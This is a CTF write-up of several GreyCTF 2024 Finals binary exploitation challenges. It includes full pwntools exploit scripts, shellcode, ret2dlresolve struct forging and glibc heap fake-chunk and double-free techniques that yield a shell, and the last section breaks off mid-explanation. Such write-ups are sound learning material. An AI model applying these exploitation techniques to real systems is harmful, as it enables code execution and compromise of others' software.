-->
In late July, I played GreyCTF 2024 Finals with slight_smile and got 1st place by a really small margin of 29 points!
The challenge archive can be found at https://github.com/NUSGreyhats/greyctf24-challs-public/tree/main/finals.
Everyone rekt the Blob Runner so hard in Greyhats Welcome CTF 2023, I made sure to make it extra secure this time ;)
Author: Elma
Solves: 4
The challenge reads shellcode into an mmaped region at 0x1337000
, and then removes write perms on this region. Before
jumping to the shellcode, it runs the shellcode through a blacklist:
for (int i = 0; i < 0x1000; i += 1) {
// block our syscall bytes the LAZY way:)
if (code[i] == 0x0f || code[i] == 0x05 || code[i] == 0xcd || code[i] == 0x80)
return 1;
}
which is meant to block syscall
and int 0x80
.
Actually, the comparison for int 0x80
doesn’t work since char
is signed but the comparison is unsigned. I tried this
for a while but soon realized that the following seccomp not only specifies syscall type, but also architecture (x64
):
// install seccomp filters as extra security!!
// it shouldn't matter though, since syscall is blocked anyways
scmp_filter_ctx ctx;
ctx = seccomp_init(SCMP_ACT_KILL);
if (!ctx)
return 1;
if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0) < 0)
return 1;
if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(sendfile), 0) < 0)
return 1;
if (seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0) < 0)
return 1;
seccomp_load(ctx);
So it blocks int 0x80
as well :(
The organizers also took a pic of me thinking I was very smart and showing the “unintended” to Elma :(
Anyway, after the seccomp, it then jumps to the shellcode after executing the following:
void call_shellcode(char* code) {
__asm__(
".intel_syntax noprefix\n"
"mov rax, rdi\n"
"mov rsp, 0\n"
"mov rbp, 0\n"
"mov rbx, 0\n"
"mov rcx, 0\n"
"mov rdx, 0\n"
"mov rdi, 0\n"
"mov rsi, 0\n"
"mov r8, 0\n"
"mov r9, 0\n"
"mov r10, 0\n"
"mov r11, 0\n"
"mov r12, 0\n"
"mov r13, 0\n"
"mov r14, 0\n"
"mov r15, 0\n"
"jmp rax\n"
".att_syntax\n"
);
}
All registers are set to 0, presumably to prevent libc or pie leaks. But if we run it in gdb, we actually see the following:
pwndbg> i r
rax 0x13370000 322371584
rbx 0x0 0
rcx 0x0 0
rdx 0x0 0
rsi 0x0 0
rdi 0x0 0
rbp 0x0 0x0
rsp 0x0 0x0
r8 0x0 0
r9 0x0 0
r10 0x0 0
r11 0x0 0
r12 0x0 0
r13 0x0 0
r14 0x0 0
r15 0x0 0
rip 0x13370000 0x13370000
eflags 0x10246 [ PF ZF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
fs_base 0x7ffff7d8d740 140737351571264
gs_base 0x0 0
In fact, the fs_base
register hasn’t been cleared out and contains a libc address. This points to the fs
struct
which stores certain important values like canary or the key for PTR_MANGLE
.
To get this value in our shellcode, we can simply mov $register, fs_base
and manipulate it from there.
With a libc leak, we can then call syscall
gadgets. The rest is trivial.
mov r8,QWORD PTR fs:0x0
mov rsp,r8
add r8,0x28c0
mov rdi,0x13370300 ; points to "./flag.txt\x00"
mov rax,0x2
lea rbx,[r8+0x90cb6] ; syscall
call rbx
mov rdi,0x1
mov rsi,rax
mov r10,0x100
mov rax,0x28
lea rbx,[r8+0x90cb6] ; syscall
call rbx
from pwn import *
import hashlib
# this code is provided to solve the PROOF OF WORK on remote (to discourage brute-forcing)
def pow_solver(p):
p.recvuntil(b"sha256(")
challenge = p.recvuntil(b" + ", drop=True)
p.recvuntil(b"(")
difficulty = int(p.recvuntil(b")", drop=True))
answer = 0
log.info(f"finding pow for {challenge.decode()}, {difficulty}")
while True:
answer += 1
h = hashlib.sha256()
h.update(challenge + str(answer).encode())
bits = ''.join(bin(i)[2:].zfill(8) for i in h.digest())
if bits.startswith('0' * difficulty):
break
p.sendlineafter(b"answer: ", str(answer).encode())
log.success("PoW solved!")
# p = remote("localhost", 34568)
if args.LOCAL:
p = process("./chall_backup")
gdb.attach(p, gdbscript="b *call_shellcode+120")
pause()
else:
p = remote("challs.nusgreyhats.org", 34568)
pow_solver(p) # uncomment if running on remote!
# fs_base + 0x1ea1a0
payload = b"\x64\x4C\x8B\x04\x25\x00\x00\x00\x00\x4C\x89\xC4\x49\x81\xC0\xC0\x28\x00\x00\x48\xC7\xC7\x00\x03\x37\x13\x48\xC7\xC0\x02\x00\x00\x00\x49\x8D\x98\xB6\x0C\x09\x00\xFF\xD3\x48\xC7\xC7\x01\x00\x00\x00\x48\x89\xC6\x49\xC7\xC2\x00\x01\x00\x00\x48\xC7\xC0\x28\x00\x00\x00\x49\x8D\x98\xB6\x0C\x09\x00\xFF\xD3"
payload += b"A" * (0x300 - len(payload))
payload += b"./flag.txt\x00"
p.sendline(payload)
p.interactive() # grey{ret_to_thread_local_storage_via_fs_register}
Writing challenges are too hard… so I wrote a program in 2 lines of code for you to pwn :/ I can even tell you that there is an obvious buffer overflow there, should be simple right?
Author: Elma
Solves: 2
The challenge source is literally 2 lines long:
#include <stdio.h>
int main(){char buf[1];return fgets(buf, 0x80, stdin);}
And the checksec is as follows:
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Given that there’s no pie and we don’t have libc leak, we can usually do 2 things:
However, we have no syscall gadget here, so SROP is out of the question. Partial RELRO is also a good sign as we can fake resolve libc functions (I don’t think ret2dlresolve is possible on full RELRO?).
In ret2dlresolve, we need to fake 3 structs: STRTAB
, SYMTAB
, and JMPREL
. These 3 structs are placed at an offset
from corresponding sections, and they are identified through indexes from the start of the section. The addresses of
these sections can be found using readelf
:
readelf -d challenge
Dynamic section at offset 0x2e20 contains 24 entries:
Tag Type Name/Value
...
0x0000000000000005 (STRTAB) 0x400450
0x0000000000000006 (SYMTAB) 0x4003d8
...
0x0000000000000017 (JMPREL) 0x400528
...
For example, in the actual resolving of fgets
, this is the helper function that is placed in GOT and called:
0x401020: push QWORD PTR [rip+0x2fe2] ; 0x404008
0x401026: bnd jmp QWORD PTR [rip+0x2fe3] ; 0x404010 (_dl_runtime_resolve_xsavec)
; ...
0x401030: endbr64
0x401034: push 0x0 ; index of fgets JMPREL
0x401039: bnd jmp 0x401020
pwndbg> tel 0x404010
00:0000│ 0x404010 (_GLOBAL_OFFSET_TABLE_+16) —▸ 0x7ffff7fd9660 (_dl_runtime_resolve_xsavec) ◂— endbr64
So, once we’ve faked all the structs, we need to jump to 0x401020
with the index of our fake JMPREL
struct at top of
stack, which will trigger the loading (and call) of our desired function.
It contains a table of strings of function names to be resolved. This is used later in SYMTAB
.
str_idx
is the distance of fake string from STRTAB
start.
On x64, this is the struct for SYMTAB
:
typedef struct
{
Elf64_Word st_name; /* Symbol name (string tbl index) */
unsigned char st_info; /* Symbol type and binding */
unsigned char st_other; /* Symbol visibility */
Elf64_Section st_shndx; /* Section index */
Elf64_Addr st_value; /* Symbol value */
Elf64_Xword st_size; /* Symbol size */
} Elf64_Sym;
st_name: str_idx
st_info: 0x12
st_other: 0x0
st_shndx: 0x0
st_value: 0x0
st_size: 0x0
sym_idx
, which is the index of our fake struct from SYMTAB
start, is calculated by dividing the distance by
sizeof(Elf64_Sym)
, which is 0x18.
typedef struct
{
Elf64_Addr r_offset; /* Address */
Elf64_Xword r_info; /* Relocation type and symbol index */
} Elf64_Rel;
r_offset: got address to write the resolved function address to
r_info: (sym_idx << 32) | 0x7
Before calling the resolver, we need to put the index of our fake JMPREL
struct at top of stack. The index is also
calculated by dividing the distance by sizeof(Elf64_Rel)
which is 0x18. Afterwards, we can jump straight to 0x401020
and trigger the resolver.
Now that we know how to fake our structs, where do we write them to? As of the first write, fgets
is writing to the
stack, which we don’t know the location of.
Disassembly of main:
endbr64
push rbp
mov rbp,rsp
sub rsp,0x10
mov rdx,QWORD PTR [rip+0x2ee7]
lea rax,[rbp-0x1]
mov esi,0x80
mov rdi,rax
call 0x401040 <fgets@plt>
leave
ret
However, notice that the buffer that fgets
writes to is relative to rbp
. We can control rbp
when leave
is
executed, as it will pop top of stack into rbp
, which we can overwrite through our buffer overflow. Therefore, we can
carefully pivot the stack to a static region in memory, return to the mov rdx, [rip+0x1ee7]
instruction (which sets
stdin
- if not fgets
won’t read from stdin
and will error out), and continue our exploit from there.
Afterwards, it’s just a matter of faking the structs, and then choosing what functions to resolve.
In my exploit, my approach was slightly more complicated. When we resolve system
, we want rdi
to point to a string
containing sh\x00
. However, after fgets
is called, these are the values in the registers:
*RDI 0x7ffff7f99720 (_IO_stdfile_0_lock) ◂— 0
*RSI 0xa666473
*RDX 0xfbad2288
*RAX 0x7fffffffd99f ◂— 0x7f000a66647361 /* 'asdf\n' */
Firstly, rdi
has been set to the address of _IO_stdfile_0_lock
, which is writable memory. However, this memory
currently doesn’t contain the sh
string we want. Since it’s not pointing to my initial buffer but to this address, I
can either try to set rdi
back to my buffer, or write sh\x00
to this address.
Secondly, rdx
is set to the flags in the stdin
FILE, and not the address of stdin
. This means that jumping
directly to fgets
without first putting the proper stdin
address in rdx
will cause the program to crash.
Thirdly, rax
actually contains the address of our buffer. So maybe we could mov rdi, rax
and hence get our buffer?
Unfortunately, we don’t have a gadget that can let us do that.
$ ROPgadget --binary challenge | grep di
0x00000000004010aa : add dil, dil ; loopne 0x401115 ; nop ; ret
0x00000000004010a5 : je 0x4010b0 ; mov edi, 0x404030 ; jmp rax
0x00000000004010e7 : je 0x4010f0 ; mov edi, 0x404030 ; jmp rax
0x00000000004010a7 : mov edi, 0x404030 ; jmp rax
0x00000000004010a6 : or dword ptr [rdi + 0x404030], edi ; jmp rax
0x0000000000401118 : sbb ebp, dword ptr [rdi] ; add byte ptr [rax], al ; add dword ptr [rbp - 0x3d], ebx ; nop ; ret
0x00000000004010a3 : test eax, eax ; je 0x4010b0 ; mov edi, 0x404030 ; jmp rax
0x00000000004010e5 : test eax, eax ; je 0x4010f0 ; mov edi, 0x404030 ; jmp rax
So trying to mov rdi, rax
is out of the question. But we can still call fgets
again to write to
_IO_stdfile_0_lock
, right?
In the disassembly of main, we can see that rdx
is set before rdi
is. Thus, it’s impossible to set rdx
to the
correct stdin
address without also modifying the value in rax
(and hence rdi
). Note: we can’t set rbp
to the
address of _IO_stdfile_0_lock
since we don’t have libc leak.
Another way to write to _IO_stdfile_0_lock
is to use an input function that doesn’t need stdin
. Then, we can simply
call that function without needing to care about rdx
being set to stdin
. So let’s resolve gets
first!
After gets
is resolved, it will be called with rdi
pointing to _IO_stdfile_0_lock
, and hence write our input into
there. In my exploit, I chose to write the address of gets
to the fgets
GOT, but it doesn’t really matter, because
for all intents and purposes, gets
and fgets
behave identically for us. After gets
is finished, it also ends up
with the same _IO_stdfile_0_lock
in rdi
, which allows us to resolve system
directly after with rdi
pointing to
sh\x00
.
#!/usr/bin/env python3
from pwn import *
exe = context.binary = ELF("./challenge")
libc = ELF("./lib/libc.so.6")
context.binary = exe
context.terminal = ["tmux", "splitw", "-v"]
if args.LOCAL:
p = process()
if args.GDB:
gdb.attach(p, gdbscript="b *gets")
pause()
else:
p = remote("challs.nusgreyhats.org", 35123)
# good luck pwning :)
payload = flat(
b"a",
0x404f30,
0x401142,
)
p.sendline(payload)
strtab = 0x400450
symtab = 0x4003d8
jmprel = 0x400528
writable = 0x404f50
Str_addr = writable + 0x18 + 0x10
str_idx = Str_addr - strtab
Str_struct = b"gets\x00"
Sym_addr = writable
sym_idx = int((Sym_addr - symtab) / 0x18)
st_name = p32(str_idx)
st_info = p8(0x12)
st_other = p8(0)
st_shndx = p16(0)
st_value = p64(0)
st_size = p64(0)
Sym_struct = st_name \
+ st_info \
+ st_other \
+ st_shndx \
+ st_value \
+ st_size
Rel_addr = writable + 0x18
reloc_arg = int((Rel_addr - jmprel) / 24)
print(f"str_idx: {str_idx}")
print(f"rel_idx: {(Rel_addr - jmprel) / 24}")
print(f"sym_idx: {(Sym_addr - symtab) / 0x18}")
r_offset = p64(0x404018)
r_info = p64((sym_idx << 32) | 0x7)
Rel_struct = r_offset + r_info
dlresolve = 0x401020
dlresolve_forge = Sym_struct + Rel_struct + Str_struct
payload = b"\x00"
payload += p64(0x404600)
payload += p64(dlresolve)
payload += p64(reloc_arg)
payload += p64(0x401142)
payload += dlresolve_forge
p.sendline(payload)
payload = b"\x00"
payload += p64(0x404f30)
payload += p64(0x401142)
p.sendline(b"sh\x00\x00")
p.sendline(payload)
Str_addr = writable + 0x18 + 0x10
str_idx = Str_addr - strtab
Str_struct = b"system\x00"
Sym_addr = writable
sym_idx = int((Sym_addr - symtab) / 0x18)
st_name = p32(str_idx)
st_info = p8(0x12)
st_other = p8(0)
st_shndx = p16(0)
st_value = p64(0)
st_size = p64(0)
Sym_struct = st_name \
+ st_info \
+ st_other \
+ st_shndx \
+ st_value \
+ st_size
Rel_addr = writable + 0x18
reloc_arg = int((Rel_addr - jmprel) / 24)
print(f"str_idx: {str_idx}")
print(f"rel_idx: {(Rel_addr - jmprel) / 24}")
print(f"sym_idx: {(Sym_addr - symtab) / 0x18}")
r_offset = p64(0x404018)
r_info = p64((sym_idx << 32) | 0x7)
Rel_struct = r_offset + r_info
dlresolve = 0x401020
dlresolve_forge = Sym_struct + Rel_struct + Str_struct
payload = b"\x00"
payload += p64(0x404600)
payload += p64(dlresolve)
payload += p64(reloc_arg)
payload += p64(0x401142)
payload += dlresolve_forge
p.sendline(payload)
p.interactive() # grey{i_actually_understand_ret2dlresolve}
If strcat exists why not memcat? or even memecat?? (Adapted from failed CS1010 exercise)
Author: jro
Solves: 1
void meme_cat() {
int x, y;
char *a = read_meme(&x);
char *b = read_meme(&y);
char *c = malloc((size_t)(x + y));
for(int i = 0; i < x; i++) {
*(c++) = *(a++);
}
for(int i = 0; i < y; i++) {
*(c++) = *(b++);
}
puts(c);
free(c);
free(b);
free(a);
}
RELRO: Full RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Obviously, the pointers are incremented and later freed, which won’t free the original chunks. This seems really trivial right?
Unfortunately, because the program frees all 3 chunks, it’s very difficult to make all the chunks valid, before we can use our arbitrary write to get RCE. The program will most likely crash before it loops back to give us our arbitrary write. We need to be a bit more deliberate in how we fake our chunks.
We need to take into consideration certain restrictions before we start making our fake chunks:
fake_chunk_addr+size+0x8
contains a valid chunk size, or it will crash with free(): invalid next size (fast)
. This means that in our first iteration, c
must go into tcache, since it’s the last chunk to be allocated, and
after it is the forest which we have no control over.b
and c
generally have to be the same (as long as b
is not size 0), since by the
end of the function, c
will be pointing to the same data as in b
(but copied over). Consequently, b
must go
into tcache in our first iteration as well.Now that we know some of the conditions we need to satisfy, let’s also plan our exploit path.
__malloc_hook
(luckily we’re on libc 2.31)Since b
and c
both need to be in tcache in our first iteration, only a
can be used as our unsorted chunk.
Conveniently, since a
is copied into c
, we can also use a
to create the fake size to fulfill free(): invalid next size
check. Then, the very end of a
should contain the fake unsorted chunk that we want to free.
p.sendlineafter(b"length of meme:", str(0x500).encode())
payload = b"A"*0x3e0
payload += flat(
0x0, 0x51,
)
payload += b"A"*(0x500 - 0x10 - len(payload))
payload += flat(
0x0, 0x421,
)
p.sendlineafter(b"meme:", payload)
For b
, we just need to fake a tcache chunk. In this case, I will use 0x41, but its quite arbitrary.
p.sendlineafter(b"length of meme:", str(0x10).encode())
payload = flat(
0x0, 0x41,
)
p.sendlineafter(b"meme:", payload)
c
inherits the same chunk size as b
.
After freeing, this is the state of the bins:
tcachebins
0x40 [ 2]: 0x7017c0 —▸ 0x701ce0 ◂— 0
fastbins
empty
unsortedbin
all: 0x701790 —▸ 0x7f7f99fa7be0 ◂— 0x701790
smallbins
empty
largebins
empty
Our 2 fake tcache chunks are nicely placed in tcache, and the unsorted bin contains our one chunk with the libc leak.
Unsorted bin is used to service small requests when tcache, fastbin, and smallbin don’t have exact fit for the requested
chunk size. In our next iteration, if we allocate a chunk of size 0x0, not only will it allocate from the unsorted bin,
it will obviously also write 0 bytes to the memory at that chunk, which allows us to retain our libc leak (if not,
fgets
will append null terminator and block off our libc leak).
p.sendlineafter(b"length of meme:", str(0x0).encode())
Now a
contains our libc leak and we can read it once c
is written to stdout.
Let’s go ahead and also make b
size 0x0.
p.sendlineafter(b"length of meme:", str(0x0).encode())
Earlier, when we created the unsorted a
in the 1st iteration, this is what the heap looks like after freeing all the
chunks:
x/50gx 0x194d790
┌───────────────────────────────┐
│ │ 0x421 │ <- fake 0x420 chunk (a), freed
│ libc leak │ │
│ │ 0x41 │ <- fake 0x40 chunk (b), freed
│ fd │ │ fd points to ──┐
│ │ 0x41 │<-──────────────┘ (c), freed
│ │ │
...
After we allocate the 2 0x0 (size 0x21) chunks and c
, but before we free, this is what the heap looks like:
x/50gx 0x194d790
┌───────────────────────────────┐
│ │ 0x21 │ <- a
│ libc leak │ │
│ │ 0x21 │ <- b (initially 0x41)
│ │ │
│ │ 0x21 │ <- c (initially 0x41)
│ │ │
│ │ 0x3c1 │ <- rest of unsorted chunk
│ │ │
...
The tcache still contains the 0x41 chunks that we freed earlier. Once c
and b
are freed, the 0x40 and 0x20 tcache
will contain the same chunks, giving us our double free!
tcachebins
0x20 [ 3]: 0x194d7a0 —▸ 0x194d7c0 —▸ 0x194d7e0 ◂— 0
0x40 [ 2]: 0x194d7c0 —▸ 0x194d7e0 ◂— 0
We will need 3 more mallocs to write to our __malloc_hook
. The 1st malloc will clear the first chunk in 0x20 that
isn’t our double free. This chunk still needs to be freed later, so we still need to fake the size (just fake it to
some other tcache that we’re not using).
p.sendlineafter(b"length of meme:", str(0x10).encode())
payload = flat(
0x0, 0x61
)
p.sendlineafter(b"meme:", payload)
The 2nd malloc will overwrite the fd pointer of the 0x40 chunk. This chunk too needs to be freed, so we also fake the size.
p.sendlineafter(b"length of meme:", str(0x10).encode())
payload = flat(
libc_base + libc.sym.__malloc_hook, 0x61
)
p.sendlineafter(b"meme:", payload)
Now, the 3rd chunk (c
) will be allocated, but in tcache 0x30 (c = malloc(0x10 + 0x10)
). So it won’t use the chunks
from 0x40 tcache. Then we can just allocate the last 2 chunks to get our arbitrary write and shell.
p.sendlineafter(b"length of meme:", str(0x30).encode())
payload = flat(
0x0, 0x61
)
p.sendlineafter(b"meme:", payload)
one_gadget = [
0xe3afe, 0xe3b01, 0xe3b04
]
p.sendlineafter(b"length of meme:", str(0x30).encode())
payload = flat(
libc_base + one_gadget[1]
)
p.sendlineafter(b"meme:", payload)
p.interactive()
#!/usr/bin/env python3
from pwn import *
exe = ELF("./chal_patched")
libc = ELF("./lib/libc.so.6")
context.binary = exe
context.terminal = ["tmux", "splitw", "-h"]
if args.LOCAL:
p = process([exe.path])
if args.GDB:
gdb.attach(p)
pause()
else:
p = remote("challs.nusgreyhats.org", 34567)
# good luck pwning :)
p.sendlineafter(b"length of meme:", str(0x500).encode())
payload = b"A"*0x3e0
payload += flat(
0x0, 0x51,
)
payload += b"A"*(0x500 - 0x10 - len(payload))
payload += flat(
0x0, 0x421,
)
print(hex(len(payload)))
p.sendlineafter(b"meme:", payload)
p.sendlineafter(b"length of meme:", str(0x10).encode())
payload = flat(
0x0, 0x41,
)
print(hex(len(payload)))
p.sendlineafter(b"meme:", payload)
p.sendlineafter(b"length of meme:", str(0x0).encode())
p.sendlineafter(b"length of meme:", str(0x0).encode())
p.recvuntil(b"Enter meme: ")
libc_base = u64(p.recvline().strip().ljust(8, b"\x00")) - 0x1ecbe0
print(hex(libc_base))
p.sendlineafter(b"length of meme:", str(0x10).encode())
payload = flat(
0x0, 0x61
)
p.sendlineafter(b"meme:", payload)
p.sendlineafter(b"length of meme:", str(0x10).encode())
payload = flat(
libc_base + libc.sym.__malloc_hook, 0x61
)
p.sendlineafter(b"meme:", payload)
p.sendlineafter(b"length of meme:", str(0x30).encode())
payload = flat(
0x0, 0x61
)
p.sendlineafter(b"meme:", payload)
one_gadget = [
0xe3afe, 0xe3b01, 0xe3b04
]
p.sendlineafter(b"length of meme:", str(0x30).encode())
payload = flat(
libc_base + one_gadget[1]
)
p.sendlineafter(b"meme:", payload)
p.interactive() # grey{f4k3_chunk_17_71l_y0u_m4k3_17}
After the success of my heap allocator, I decided to help the NUSmods team out with a super fast data structure
Author: jro
Solves: 0
The moment I saw this challenge, I immediately had nightmares of heapheapheap from quals and closed it.
After the CTF there was a first blood prize of $50 for the first solve, so the Thursday after the CTF I decided to take another look to win more money :D
The challenge is an “AVL tree” implementation that allows us to insert, delete, and search for nodes. Nodes are rebalanced after every insert and delete. Now, as a non-CS student, I have no idea what an AVL tree is, so I just spammed random stuff until I managed to crash the program.
When deleting a node with 2 children, the program will somehow swap the parent node’s data with the child’s, move the child up to the parent’s spot, and then free the original node. This grants us our UAF, and afterwards it should be quite trivial..?
This is the struct of a Node:
typedef struct Node {
int key;
unsigned int height;
struct Node *left;
struct Node *right;
void *data;
} Node;
And this is the implementation for create/delete:
Node *insert(AVLTree *tree, int key, void *data){
Node *node = calloc(sizeof(struct Node), 1);
node->key = key;
node->data = data;
node->height = 1;
tree->root = insert_inner(tree->root, node); // just inserts node in correct position
return node;
}
// create node
void create_mod(AVLTree *tree) {
// ... stuff to get module code and length
char *buf = calloc(mod_desc_len, 1);
if(buf == NULL){
puts("Description too long!");
return;
}
printf("Enter module description: ");
fgets(buf, mod_desc_len, stdin);
insert(tree, hash, buf);
return;
}
Node *del_inner(Node *node, int key){
if(node == NULL){
return NULL;
}
if(key > node->key){
node->right = del_inner(node->right, key);
} else if(key < node->key) {
node->left = del_inner(node->left, key);
} else {
if(node->left == NULL || node->right == NULL){
free(node->data);
if(node->left == NULL && node->right == NULL){
free(node);
return NULL;
}
if(node->left == NULL){
*node = *node->right;
} else {
*node = *node->left;
}
} else {
Node* cur = node->right;
while(cur->left != NULL){
cur = cur->left;
}
node->key = cur->key;
free(node->data);
node->data = cur->data;
node->right = del_inner(node->right, cur->key);
}
}
// ... rebalance tree
}
void del_node(AVLTree *tree, int key){
tree->root = del_inner(tree->root, key);
}
// delete
void delete_mod(AVLTree *tree){
// ... get module code
del_node(tree, hash);
printf("Module %s deleted!", mod_code);
}
The challenge is using glibc 2.39, and using calloc to allocate the chunks. This creates a few considerations for us:
Tcache
Tcache is not used by calloc, so we cannot do a simple tcache dup/overwrite.
Fastbin
_int_malloc
checks whether the chunk is in the correct fastbin size before allocating, which means we already need
partial write at our desired target before we can actually allocate to it, making fastbin attack a lot more restricted.
Unsorted/largebin
Either unsorted bin or largebin attack is not possible. (I initially wanted to use this to overwrite global_max_fast
so I can easily do House of Apple with fastbins)
Unsorted bin attack was made obsolete in glibc 2.29, with the addition of these checks, which prevents us from putting
arbitrary values into bk
pointer.
bck = victim->bk;
size = chunksize (victim);
mchunkptr next = chunk_at_offset (victim, size);
if (__glibc_unlikely (size <= 2 * SIZE_SZ)
|| __glibc_unlikely (size > av->system_mem))
malloc_printerr ("malloc(): invalid size (unsorted)");
if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
|| __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
malloc_printerr ("malloc(): invalid next size (unsorted)");
if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
if (__glibc_unlikely (bck->fd != victim)
|| __glibc_unlikely (victim->fd != unsorted_chunks (av)))
malloc_printerr ("malloc(): unsorted double linked list corrupted");
if (__glibc_unlikely (prev_inuse (next)))
malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
Largebin attack is impossible in this current scenario, because the 0x30 chunks that are allocated after each data chunk is allocated will cause any existing largebin chunks to go back into unsorted bin.
With this info, we can see that only an attack on fastbin is feasible. Before we proceed, let’s get a useful leak first. (Note: I used the debug version to visualize the tree so that I can tell which nodes to free)
With the UAF earlier, it’s easy to leak the heap - simply read the data of the node that inherited the parent’s data chunk.
# set up the tree
for i in range(10):
add(f"CS{i}001".encode(), 0x70, b"asdf")
add(b"CS2001", 0x70, b"asdf")
# fill up 0x80 tcache
for i in range(9, 2, -1):
delete(f"CS{i}001".encode())
# uaf
delete(b"CS2001")
delete(b"CS0001")
delete(b"CS1001")
# get heap leak
heap_leak = u64(search(b"CS2001").ljust(8, b"\x00"))
heap_leak = fastbin_decrypt(heap_leak) - 0x3f0
Within the heap region, we can still do arbitrary writes because we can write the appropriate size to the location we are targeting. It looks something like this:
┌─────────────────────────────────┐
│ │ 0xxx │ actual data chunk
│ │ │
│ │ │
│ │ │
│ │ 0x81 │ fake fastbin size
│ fd │ │ (make sure fd is valid, so after allocating this chunk the fastbin won't be broken)
│ │ 0x31 │ end of data chunk, start of Node chunk
│ hash │ *left │ just use gdb to check and copy these values
│ *right │ *data │ overwrite this pointer
│ │ │
└─────────────────────────────────┘
The crucial parts are ensuring that fd is properly encrypted as 0
with the correct address, and hash, left, and right
are correctly set. (In some instances, these values may need to be tweaked to manually fix the tree)
We can then escalate this into something better (eg. overwrite data pointer for more useful leaks)
pos1 = heap_leak + 0x980
target1 = heap_leak + 0x9d0
# double free
delete(b"CS2001")
# overwrite fastbin ptr
payload = p64(fastbin_encrypt(pos1, target1))
add(b"CS0001", 0x70, payload)
payload = flat(
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x0,
0x0, 0x81, # to fake a fastbin chunk here
fastbin_encrypt(heap_leak + 0x9e0, 0), 0x0,
)
# get 3 more to reach fake chunk
for i in range(3):
add(f"CS100{i}".encode(), 0x70, payload)
payload = flat(
0x0, 0x0,
0x0, 0x31,
0xdeadbeef, 0x0,
0x0, 0xcafebabe,
0x0, 0x31,
0x1ffffde29, 0x0,
# *right, *data
heap_leak + 0xd00, heap_leak + 0xb20, # unsorted leak will be here later
)
add(b"CS2000", 0x70, payload)
As mentioned earlier, we just need to overwrite the data pointer for libc leak.
# make new smallbin chunks and free them for unsorted leak
for i in range(8):
add(f"CS999{i}".encode(), 0xf0, b"a")
for i in range(7, -1, -1):
delete(f"CS999{i}".encode())
libc_leak = u64(search(b"\xff\xff1337").ljust(8, b"\x00")) - 0x203b20
print(hex(libc_leak))
After this, I initially tried a different approach (which got really close!), and because I think it’s quite cool I’ll add it to the writeup too.
House of Mind is an old attack that used non-main arena logic to write a freed chunk address at an arbitrary location in memory. This attack comes in 2 variants, unsorted and fastbin.
Non-main arena chunks are indicated in the size field by the 0x4 bit. The arena stores information about fastbins, unsorted bins and small/large bins, as well as other stuff like available memory in the heap and the address of top chunk. If a chunk is using the main arena, it will simply read from and write to the main arena, which is found in libc. However, if the chunk isn’t using main arena, it first resolves the address from another struct in the heap, which (for non-main arena heaps) should be placed at the very top of the heap.
From glibc source:
To find the arena for a chunk on such a non-main arena, heap_for_ptr performs a bit mask operation and indirection through the ar_ptr member of the per-heap header heap_info (see arena.c).
arena.c
:
typedef struct _heap_info
{
mstate ar_ptr; /* Arena for this heap. */
struct _heap_info *prev; /* Previous heap. */
size_t size; /* Current size in bytes. */
size_t mprotect_size; /* Size in bytes that has been mprotected
PROT_READ|PROT_WRITE. */
size_t pagesize; /* Page size used when allocating the arena. */
/* Make sure the following data is properly aligned, particularly
that sizeof (heap_info) + 2 * SIZE_SZ is a multiple of
MALLOC_ALIGNMENT. */
char pad[-3 * SIZE_SZ & MALLOC_ALIGN_MASK];
} heap_info;
struct malloc_state
{
/* Serialize access. */
__libc_lock_define (, mutex);
/* Flags (formerly in max_fast). */
int flags;
/* Set if the fastbin chunks contain recently inserted free blocks. */
/* Note this is a bool but not all targets support atomics on booleans. */
int have_fastchunks;
/* Fastbins */
mfastbinptr fastbinsY[NFASTBINS];
/* Base of the topmost chunk -- not otherwise kept in a bin */
mchunkptr top;
/* The remainder from the most recent split of a small request */
mchunkptr last_remainder;
/* Normal bins packed as described above */
mchunkptr bins[NBINS * 2 - 2];
/* Bitmap of bins */
unsigned int binmap[BINMAPSIZE];
/* Linked list */
struct malloc_state *next;
/* Linked list for free arenas. Access to this field is serialized
by free_list_lock in arena.c. */
struct malloc_state *next_free;
/* Number of threads attached to this arena. 0 if the arena is on
the free list. Access to this field is serialized by
free_list_lock in arena.c. */
INTERNAL_SIZE_T attached_threads;
/* Memory allocated from the system in this arena. */
INTERNAL_SIZE_T system_mem;
INTERNAL_SIZE_T max_system_mem;
};
libc-pointer-arith.h
:
/* Align a value by rounding down to closest size.
e.g. Using size of 4096, we get this behavior:
{4095, 4096, 4097} = {0, 4096, 4096}. */
#define ALIGN_DOWN(base, size) ((base) & -((__typeof__ (base)) (size)))
/* Same as ALIGN_DOWN(), but automatically casts when base is a pointer. */
#define PTR_ALIGN_DOWN(base, size) \
((__typeof__ (base)) ALIGN_DOWN ((uintptr_t) (base), (size)))
malloc.c
:
/* find the heap and corresponding arena for a given ptr */
static inline heap_info *
heap_for_ptr (void *ptr)
{
size_t max_size = heap_max_size ();
return PTR_ALIGN_DOWN (ptr, max_size);
}
static inline struct malloc_state *
arena_for_chunk (mchunkptr ptr)
{
return chunk_main_arena (ptr) ? &main_arena : heap_for_ptr (ptr)->ar_ptr;
}
// ..__libc_free
{
MAYBE_INIT_TCACHE ();
/* Mark the chunk as belonging to the library again. */
(void)tag_region (chunk2mem (p), memsize (p));
ar_ptr = arena_for_chunk (p);
_int_free (ar_ptr, p, 0);
}
So for non-main arena chunks, the address of arena is resolved from heap_info
, which is found using the
PTR_ALIGN_DOWN
macro. In other words: heap_info = chunk & ~(0x4000000 - 1)
. At this address, the arena pointer is
stored, which will be passed to _int_free
. _int_free
then does stuff with it (eg. writing to the fastbins in arena).
If we are able to control the pointer at this address, then we can achieve our partial write.
And it’s not hard - we just need to create enough chunks so that the heap expands all the way past our desired address
of heap_info
and write the av
pointer to the location. Then when we create a chunk (fastbin), overwrite its size to
add the non_main_arena
flag, and then free that chunk, it will write the pointer to the arena address we control.
